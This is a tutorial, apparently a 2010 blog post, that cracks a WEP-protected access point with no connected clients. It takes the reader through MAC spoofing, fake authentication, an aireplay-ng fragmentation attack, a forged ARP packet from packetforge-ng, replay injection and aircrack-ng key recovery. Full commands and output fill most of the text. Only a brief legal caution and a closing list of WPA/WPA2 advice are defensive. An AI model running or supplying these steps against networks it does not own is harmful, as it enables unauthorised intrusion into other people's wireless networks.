Wireless security: Clientless WEP cracking

WEP is weak, you know it's true, and here is another reason why.

Most of the techniques that attackers can use to break into WEP wireless networks, are based on sniffing traffic from clients. Information found is then used for amplification of traffic to/from clients in order to find enough packets, with weak Initialization Vectors (IVs) so that the WEP key can be guessed using statistical techniques.

Often clients may not be on the network at the time the attacker is trying to penetrate it, but penetration is still possible - even without active clients.

Here we look at the "Clientless WEP attack", which uses techniques to construct portions of the PRGA keystream, so that packets (of the attackers choice) can be injected into the network, and broadcast responses (with weak IVs) can be collected.

We are going to be using Backtrack 4 and the Aircrack-ng suite of command-line tools.

Please be good, and only try these techniques on your own test equipment. There is such a thing as the law you know, and breaking into someone else's Wireless router is against the law.

As we are posing as a sneaky attacker, we will change our MAC address before we bring the card up in monitor mode.

modprobe rt73
macchanger -r rausb0
macchanger -s rausb0 >> info.txt
airmon-ng start rausb0 7

First we have a quick look at our target WAP.

airodump-ng --encrypt wep -w macchangeclientless2 --channel 7 rausb0

 CH  7 ][ Elapsed: 0 s ][ 2010-07-21 13:04

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  105 100       26       0    7   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

We now have all the details we need for the attack:

• Our attacking MAC address = 32:32:fe:16:ea:29
• The victim WAP ESSID = SlowNet
• The victim WAP BSSID = 00:90:D0:2A:0C:7F
• The WAP is on channel 7

Then we need to fake-authenticate to the access point, to make sure our packets are accepted.

aireplay-ng -1 0 -e SlowNet -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0


 CH  7 ][ Elapsed: 20 s ][ 2010-07-21 13:04

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  105 100       46       15    7   7  54e  WEP  WEP         SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  32:32:FE:16:EA:29   -1    1 - 0      0        1

That's our wireles card "fake authenticated" to the WAP. Next we need to test injection using aireplay.

aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:31  Trying broadcast probe requests...
13:06:32  No Answer...
13:06:32  Found 1 AP

13:06:32  Trying directed probe requests...
13:06:32  00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:06:38   0/30:   0%

The card I am using here is not great, so I practically need to be in the same room, lets get closer...

aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:59  Trying broadcast probe requests...
13:06:59  Injection is working!
13:07:01  Found 1 AP

13:07:01  Trying directed probe requests...
13:07:01  00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:07:01  Ping (min/avg/max): 0.059ms/9.589ms/114.156ms Power: 108.59
13:07:01  29/30:  96%

That's better, and this is something to watch out for. You need to be close to the WAP, for the fragmentation attack to work, because you need a good percentage of your transmissions to be received by the WAP.

So now we can start a fragmentation attack to get some keystream data

aireplay-ng -5 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:08:37  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
13:08:37  Waiting for a data packet...
Read 276 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0E:50:EC:B2:A6

        0x0000:  0862 0000 ffff ffff ffff 0090 d02a 0c7f  .b...........*.
        0x0010:  000e 50ec b2a6 b0cd 8e68 6200 7cb2 7315  ..P......hb.|.s.
        0x0020:  1d3a f884 9feb 9451 d96f 83c0 90fc fdf3  .:.....Q.o......
        0x0030:  bec5 a496 7b8a dc6c 74c1 17e6 8e56 9be1  ....{..lt....V..
        0x0040:  f966 d142                                .f.B

Use this packet ? y

Saving chosen packet in replay_src-0721-130905.cap
13:09:08  Data packet found!
13:09:08  Sending fragmented packet
13:09:08  Got RELAYED packet!!
13:09:08  Trying to get 384 bytes of a keystream
13:09:08  Got RELAYED packet!!
13:09:08  Trying to get 1500 bytes of a keystream
13:09:09  Got RELAYED packet!!
Saving keystream in fragment-0721-130908.xor

This gives us 1500 bytes of keystream data, which we can XOR with our packets to encrypt them for the wireless network.

We will make a broadcast ARP packet from the keystream data obtained

packetforge-ng -0 -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 -k 255.255.255.255 -l 255.255.255.255 -y
fragment-0721-130908.xor -w arp-request3
Wrote packet to: arp-request3

Lets see what it looks like

tcpdump -n -e -vvv -s0 -r arp-request3
reading from file arp-request3, link-type IEEE802_11 (802.11)
13:10:37.855810 WEP Encrypted 258us BSSID:00:90:d0:2a:0c:7f SA:32:32:fe:16:ea:29 DA:ff:ff:ff:ff:ff:ff Data IV:6268ad Pad 0 KeyID 0

Now we will inject many copies of our constructed packet onto the network so that we can collect the responses.

aireplay-ng -2 -r arp-request3 rausb0
No source MAC (-h) specified. Using the device MAC (32:32:FE:16:EA:29)


        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:90:D0:2A:0C:7F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  32:32:FE:16:EA:29

        0x0000:  0841 0201 0090 d02a 0c7f 3232 fe16 ea29  .A.....*.22...)
        0x0010:  ffff ffff ffff 8001 ad68 6200 c337 dd5b  .........hb..7.[
        0x0020:  8eb8 18ef 6c25 f5ba 4601 80a0 decd a9fe  ....l%..F.......
        0x0030:  c556 3a2d c853 3407 ad01 7288 e29e f251  .V:-.S4...r....Q
        0x0040:  2beb e700                                +...

Use this packet ? y

Saving chosen packet in replay_src-0721-131037.cap
You should also start airodump-ng to capture replies.

Looking at our dump screen we can see that the data packets are now rapidly expanding


 CH  7 ][ BAT: 1 hour 42 mins ][ Elapsed: 6 mins ][ 2010-07-21 13:12

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  111  88     3744     5540  162   7  54e  WEP  WEP    OPN  SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 (not associated)   00:14:A5:2B:49:FF  102    0 - 1      0       11


... so we can start aircrack-ng to crack the WEP key...

aircrack-ng macchangeclientless2-01.cap

                                                       Aircrack-ng 1.1 r1738


                                       [00:00:30] Tested 9 keys (got 14851 IVs)

   KB    depth   byte(vote)
    0    0/  1   AA(32512) 36(27648) 46(26880) 5C(26880) 6B(26624) BA(25856) 5F(24832) AB(24832) 39(24064)
    1    2/  4   08(27648) 65(26368) EF(26368) 3F(25856) 42(25088) C1(24832) 88(24064) DF(24064) EC(24064)
    2    0/  1   CC(30208) DD(28160) 4C(25856) 71(25344) 2A(25088) 37(25088) A3(25088) E6(24832) 73(24576)
    3    1/  2   DD(26624) B5(25344) 22(25088) CE(25088) E5(24576) 44(24320) 93(24320) 96(24320) 80(24064)
    4    0/  1   EE(27904) 6C(26112) 32(25344) 23(24832) 27(24576) 3F(24576) BE(24576) 1E(24320) 2D(24320)

                         KEY FOUND! [ AA:BB:CC:DD:EE ]
        Decrypted correctly: 100%

... and in 30 seconds, the WEP key is ours...
And thats a wrap...

To prevent these issues

• Always use WPA or WPA2 for secure networks
• Never use WEP except where you don't mind an access point being completely open
• Choose a strong and long password